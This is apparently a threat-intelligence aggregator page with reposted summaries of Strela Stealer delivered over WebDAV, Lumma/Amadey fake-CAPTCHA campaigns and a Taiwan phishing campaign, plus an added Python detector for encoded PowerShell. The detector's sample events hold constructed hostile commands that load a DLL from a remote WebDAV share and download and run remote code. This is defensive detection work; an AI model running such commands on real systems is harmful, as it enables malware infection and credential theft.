Home - The article:
Source |
RiskIQ |
Identifier |
8603945 |
Publication date |
2024-10-30 22:28:21 (viewed: 2024-10-30 23:07:27) |
Title |
Strela Stealer targets Central and Southwestern Europe through Stealthy Execution via WebDAV (Recycled) |
Text |
#### Targeted Geolocations
- Spain
- Germany
## Snapshot
The latest Strela Stealer phishing campaign, identified by Cyble Research and Intelligence Labs, uses deceptive invoices to lure victims, mainly impacting Central and Southwestern Europe.
## Description
These phishing emails carry ZIP archives containing obfuscated JavaScript files that, when opened, run a PowerShell command which retrieves the malicious payload directly from a WebDAV (Web Distributed Authoring and Versioning) server. Because the payload is never written to disk by a conventional download step, Strela Stealer sidesteps defenses that key on dropped files. The payload is a DLL built to harvest email credentials and other sensitive details, specifically from Microsoft Outlook and Mozilla Thunderbird, and to transmit them to the attackers' command-and-control server.
Strela Stealer tailors its activity to specific geographic areas, in this campaign mainly Germany and Spain, by checking the locale settings of the infected system. It also collects system details and file directory listings, giving the attackers reconnaissance data for possible follow-up attacks. Evasion relies on JavaScript obfuscation and base64 encoding, which makes the chain harder for security tools to detect. Strela Stealer's evolution, from simple phishing with ISO attachments to fileless execution, illustrates the ongoing advancement of malware distribution tactics and the need for robust defenses against such threats.
## Microsoft Analysis and Additional OSINT Context
Threat actors use WebDAV to distribute information-stealing malware such as Strela Stealer because it offers several advantages for evasion, simplicity and control over payload delivery:
- Fileless execution and evasion: WebDAV lets a payload be executed straight from a remote server without the victim's tooling writing it to disk first, which bypasses defenses that focus on scanning downloaded files. The term is relative, however: the Windows WebClient service still keeps a local cache copy of the files it fetches, and the process that loads a DLL from a UNC path is visible in endpoint telemetry, so process-creation and module-load monitoring remain a detection opportunity.
- Direct remote access: WebDAV is designed to let clients treat a remote server as though it were a local folder, so attackers can serve payloads over HTTP/HTTPS through what looks like a legitimate remote share connection, reducing the chance of detection.
- Efficient data transmission: WebDAV gives real-time access to server-side resources, so attackers can swap payloads or update malicious DLLs on their server and have every victim pick up the new version without being reinfected.
- Bypassing firewalls and security filters: many organizations allow outbound WebDAV over HTTP or HTTPS, so the traffic blends into normal web traffic and communication with compromised devices does not raise alarms.
- Modular and scalable attacks: because the payload lives on a centralized server, the operator updates files in one place to affect every infected system, extending the malware's reach with minimal effort on the attacker's side.
These qualities make WebDAV an attractive option for attackers seeking stealthy, flexible and scalable ways to deliver information-stealing malware.
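As an added example (not code from the Cyble report or from Microsoft's analysis), the following Python triages process-creation events for the delivery chain described above: it decodes a PowerShell `-EncodedCommand` argument (base64 over UTF-16LE, which is what PowerShell expects) and then looks in both the raw and decoded command lines for WebDAV access and in-memory download cradles. The UNC form `\\host@SSL@443\DavWWWRoot\...` is how the Windows WebClient service addresses an HTTPS WebDAV share; the `rundll32` invocation in the sample, the `/webdav/` URL form, the Sysmon-style field names and every host, path and file name are assumptions of this example, not indicators from the article. The same decoder also covers the base64-encoded PowerShell command that the fake-CAPTCHA (Lumma/Amadey) repost further down relies on, so that passage gets no separate example.

```python
"""Triage of process-creation events for WebDAV-delivered, in-memory PowerShell
payloads. Added example, not code from the Cyble or Microsoft write-ups. Field
names (Image, ParentImage, CommandLine) mirror Sysmon Event ID 1; all sample
events below are constructed and every host, path and file name is invented."""
import base64
import re
from typing import Optional

# WebDAV indicators. The \\host@SSL@443\DavWWWRoot\ UNC form is the Windows
# WebClient (mini-redirector) syntax for an HTTPS share; the http(s)://.../webdav/
# form and "net use" against a URL are assumed variants for this example.
WEBDAV_PATTERNS = [
    re.compile(r"\\\\[\w.-]+@(?:ssl(?:@\d+)?|\d+)\\", re.I),
    re.compile(r"davwwwroot", re.I),
    re.compile(r"https?://[^\s'\"]+/webdav/", re.I),
    re.compile(r"\bnet\s+use\b.*https?://", re.I),
]
# Generic in-memory execution / download-cradle indicators.
CRADLE_PATTERNS = [
    re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b", re.I),
    re.compile(r"\b(?:rundll32|regsvr32)(?:\.exe)?\b", re.I),
]
SCRIPT_HOSTS = ("wscript.exe", "cscript.exe", "mshta.exe")
ENCODED_FLAG = re.compile(
    r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the plaintext of a PowerShell -EncodedCommand argument, or None.
    PowerShell wraps UTF-16LE text in the base64, not UTF-8."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_event(event: dict) -> dict:
    """Score one process-creation event and return which indicators fired."""
    image = event.get("Image", "").lower()
    cmdline = event.get("CommandLine", "")
    decoded = None
    if image.endswith(("powershell.exe", "pwsh.exe")):
        decoded = decode_encoded_command(cmdline)
    # Inspect the raw command line and the decoded payload together, because the
    # WebDAV path only becomes visible after decoding.
    text = cmdline + "\n" + (decoded or "")
    hits = {
        "encoded_command": decoded is not None,
        "webdav": any(p.search(text) for p in WEBDAV_PATTERNS),
        "cradle": any(p.search(text) for p in CRADLE_PATTERNS),
        "script_host_parent": event.get("ParentImage", "").lower().endswith(SCRIPT_HOSTS),
    }
    if hits["webdav"]:
        verdict = "webdav_delivery"
    elif hits["encoded_command"] and hits["cradle"]:
        verdict = "encoded_cradle"
    elif any(hits.values()):
        verdict = "suspicious"
    else:
        verdict = "clean"
    return {"verdict": verdict, "decoded": decoded, **hits}


def _encode(ps: str) -> str:
    """Build a -EncodedCommand value the way PowerShell expects it."""
    return base64.b64encode(ps.encode("utf-16-le")).decode("ascii")


PS_IMAGE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Constructed sample telemetry (hosts, paths and file names are invented).
SAMPLE_EVENTS = [
    {"Image": PS_IMAGE, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe -NoProfile -Command Get-Service WebClient"},
    # JS dropper from the ZIP lure spawning PowerShell that runs a DLL off WebDAV
    {"Image": PS_IMAGE, "ParentImage": r"C:\Windows\System32\wscript.exe",
     "CommandLine": "powershell.exe -w hidden -enc " + _encode(
         r"rundll32.exe \\203.0.113.10@SSL@443\DavWWWRoot\inv\invoice.dll,Entry")},
    # Fake-CAPTCHA style: a user-pasted encoded cradle with no WebDAV involved
    {"Image": PS_IMAGE, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe -w hidden -ep bypass -e " + _encode(
         "iex (iwr 'https://203.0.113.20/verify' -UseBasicParsing).Content")},
]


def triage(events) -> list:
    """Return one verdict per event, in input order."""
    return [analyze_event(e)["verdict"] for e in events]


if __name__ == "__main__":
    for ev, verdict in zip(SAMPLE_EVENTS, triage(SAMPLE_EVENTS)):
        print(f"{verdict:16} {ev['CommandLine'][:60]}")
```

Run it against a real export of Sysmon Event ID 1 (or Windows 4688 with command-line auditing enabled) by mapping your fields onto `Image`, `ParentImage` and `CommandLine`; the `script_host_parent` flag captures the ZIP-delivered JavaScript stage, and the decoded text is returned so an analyst can read what was actually executed.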
## Recommendations
Microsoft recommends the following mitigations to reduce the impact of this threat. Check the recommendations card for the deployment status of monitored mitigations.
- Check your Office 365 email filtering settings to ensure you block spoofed emails, spam, and emails with malware. Use [Microsoft Defender for Office 365](https://learn.microsoft.com/microsoft-365/security/office-365-security/defender-for-office-365?ocid=magicti_ta_learndoc) for enhanced phishing protection and coverage against new threats and polymorphic variants. Configure Microsoft Defender for Office 365 t |
Tags |
Ransomware
Spam
Malware
Tool
Threat
Reposts of the article (1):
Source |
RiskIQ |
Identifier |
8603374 |
Publication date |
2024-10-29 16:30:09 (viewed: 2024-10-29 17:07:18) |
Title |
Lumma/Amadey: fake CAPTCHAs want to know if you're human (Recycled) |
Text |
## Snapshot
Cybercriminals continue to use [fake CAPTCHAs](https://security.microsoft.com/intel-explorer/articles/9c8e0b72) as an initial infection vector to distribute malware. [Lumma Stealer](https://security.microsoft.com/intel-profiles/3393357882548511C30B0728DDD3C4F8B5CA20E41C285A56F796EB39F57531ad) was primarily distributed through sites offering cracked games and adult content, betting platforms, anime resources and web applications. Security researchers have also found CAPTCHAs delivering the Amadey Trojan.
## Description
The malicious CAPTCHA is part of an ad network that carries genuine offers alongside redirects leading to pages with the fake CAPTCHA. The CAPTCHA instructs users to execute a base64-encoded PowerShell command, which leads to an obfuscated PowerShell script that downloads the malicious payload. Lumma Stealer abuses the legitimate BitLockerToGo.exe binary to manipulate the registry and search for files tied to cryptocurrency wallets, browser extensions, cookies and password-manager archives in order to steal data. The Trojan then attempts to use the same tool to send the stolen data to the attacker's server. Next it visits various online stores, possibly to boost view counts and generate revenue for its operators. The campaign also distributes the Amadey Trojan, which steals credentials from web browsers and various Virtual Network Computing (VNC) systems, swaps cryptocurrency wallet addresses in the clipboard and, in some cases, takes screenshots and downloads the Remcos remote access tool to the victim's device.
Securelist reports that between 22 September and 14 October 2024 more than 140,000 users encountered ads tied to this campaign, and more than 20,000 of them were redirected to infected sites. The most affected users were in Brazil, Spain, Italy and Russia.
## Recommendations
Microsoft recommends the following mitigations to reduce the impact of this threat. Check the recommendations card for the deployment status of monitored mitigations.
- Check your Office 365 email filtering settings to ensure you block spoofed emails, spam and emails with malware. Use [Microsoft Defender for Office 365](https://learn.microsoft.com/microsoft-365/security/office-365-security/defender-for-office-365?ocid=magicti_ta_learndoc) for enhanced phishing protection and coverage against new threats and polymorphic variants. Configure Microsoft Defender for Office 365 to [recheck links on click](https://learn.microsoft.com/microsoft-365/security/office-365-security/safe-links-about?ocid=magicti_ta_learndoc) and [delete sent mail](https://learn.microsoft.com/microsoft-365/security/office-365-security/zero-hour-auto-purge?ocid=magicti_ta_learndoc) in response to newly acquired threat intelligence. Turn on [Safe Attachments policies](https://learn.microsoft.com/microsoft-365/security/office-365-security/safe-attachments-policies-configure?ocid=magicti_ta_learndoc) to check inbound email attachments.
- Encourage users to use Microsoft Edge and other web browsers that support [SmartScreen](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/web-protection-overview?ocid=magicti_ta_learndoc), which identifies and blocks malicious websites, including phishing sites, scam sites and sites that host malware.
- Turn on [cloud-delivered protection](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/configure-block-at-first-sight-microsoft-defender-antivirus?ocid=magicti_ta_learndoc) in Microsoft Defender Antivirus, or the equivalent for your antivirus product, to cover the tools and techniques of att |
Tags |
Ransomware
Spam
Malware
Tool
Threat
The article resembles 1 other article(s):
Src | Date (GMT) | Title | Description | Tags | Stories | Notes |
2024-11-01 16:56:15 |
(Déjà vu) Threat actors use copyright infringement phishing lure to deploy infostealers (direct link) |
#### Targeted Geolocations
- Taiwan
## Snapshot
Cisco Talos recently identified a phishing campaign targeting Facebook business and advertising accounts in Taiwan.
## Description
The campaign uses emails posing as legal notices from well-known companies, alleging copyright infringement and demanding action within 24 hours. The emails lure recipients into downloading malware disguised as PDF files. The threat actor uses several techniques to evade detection, notably abusing Google's AppSpot.com domains and Dropbox for malware distribution.
The phishing emails are written in Traditional Chinese, with file names crafted to resemble legal documents from recognizable companies, suggesting the attacker researched its targets thoroughly. When victims download the attached RAR file, a password-protected archive contains an information stealer, typically LummaC2 or Rhadamanthys, which collects sensitive data including system credentials and transmits it to the attacker's command-and-control (C2) servers.
Talos observed that LummaC2 encrypts its shellcode, hides the payload in system memory and uses the CreateFileMappingA API to evade detection. Rhadamanthys likewise relies on obfuscation and process injection, inflating file sizes to evade antivirus scans and embedding itself in legitimate system processes. Both malware loaders manipulate registry entries for persistence and use mutex objects to prevent duplicate infections. The campaign demonstrates the growing sophistication of phishing attacks on business accounts and of the methods used to bypass traditional security measures.
## Recommendations
Microsoft recommends the following mitigations to reduce the impact of this threat. Check the recommendations card for the deployment status of monitored mitigations.
- Check your Office 365 email filtering settings to ensure you block spoofed emails, spam and emails with malware. Use [Microsoft Defender for Office 365](https://learn.microsoft.com/microsoft-365/security/office-365-security/defender-for-office-365?ocid=magicti_ta_learndoc) for enhanced phishing protection and coverage against new threats and polymorphic variants. Configure Microsoft Defender for Office 365 to [recheck links on click](https://learn.microsoft.com/microsoft-365/security/office-365-security/safe-links-about?ocid=magicti_ta_learndoc) and [delete sent mail](https://learn.microsoft.com/microsoft-365/security/office-365-security/zero-hour-auto-purge?ocid=magicti_ta_learndoc) in response to newly acquired threat intelligence. Turn on [Safe Attachments policies](https://learn.microsoft.com/microsoft-365/security/office-365-security/safe-attachments-policies-configure?ocid=magicti_ta_learndoc) to check inbound email attachments.
- Encourage users to use Microsoft Edge and other web browsers that support [SmartScreen](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/web-protection-overview?ocid=magicti_ta_learndoc), which identifies and blocks malicious websites, including phishing sites, scam sites and sites that host malware.
- Turn on [cloud-delivered protection](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/configure-block-at-first-sight-microsoft-defender-antivirus?ocid=magicti_ta_learndoc) in |
Ransomware
Spam
Malware
Tool
Threat